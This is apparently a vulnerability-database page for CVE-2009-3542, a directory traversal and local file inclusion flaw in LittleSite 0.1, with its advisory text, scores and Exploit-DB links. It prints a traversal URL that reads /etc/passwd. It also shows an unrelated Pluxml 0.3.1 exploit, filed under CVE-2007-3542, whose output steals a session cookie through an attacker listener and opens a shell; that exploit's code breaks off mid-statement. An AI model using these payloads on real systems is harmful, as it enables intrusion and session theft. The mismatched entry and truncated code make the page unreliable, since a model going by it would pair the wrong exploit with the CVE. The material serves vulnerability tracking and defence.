CVE-2009-3542
published 2009-10-02CVE-2009-3542: Directory traversal vulnerability in ls.php in LittleSite (aka LS or LittleSite.php) 0.1 allows remote attackers to include and execute arbitrary local files…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.39%
81.8th percentile
Directory traversal vulnerability in ls.php in LittleSite (aka LS or LittleSite.php) 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the file parameter to index.php. NOTE: in some environments, this can be leveraged for remote file inclusion by using a UNC share pathname or an ftp, ftps, or ssh2.sftp URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kneuro | littlesite.php | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LittleSite 0.1 - 'index.php' Local File Inclusion
exploitdb·2014-09-23
CVE-2009-3542 LittleSite 0.1 - 'index.php' Local File Inclusion
LittleSite 0.1 - 'index.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/43495/info
LittleSite is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
LittleSite 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/littlesite/index.php?file=../../../../etc/passwd
Exploit-DB
Pluxml 0.3.1 - Remote Code Execution
exploitdb·2007-06-24
CVE-2007-3542 Pluxml 0.3.1 - Remote Code Execution
Pluxml 0.3.1 - Remote Code Execution
---
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #[email protected]
Note: Coded for fun 8)
Usage: $a
No writeups or analysis indexed.
http://osvdb.org/55969http://packetstormsecurity.org/0907-exploits/ls-lfi.txthttp://secunia.com/advisories/35907https://exchange.xforce.ibmcloud.com/vulnerabilities/51819http://osvdb.org/55969http://packetstormsecurity.org/0907-exploits/ls-lfi.txthttp://secunia.com/advisories/35907https://exchange.xforce.ibmcloud.com/vulnerabilities/51819
2009-10-02
Published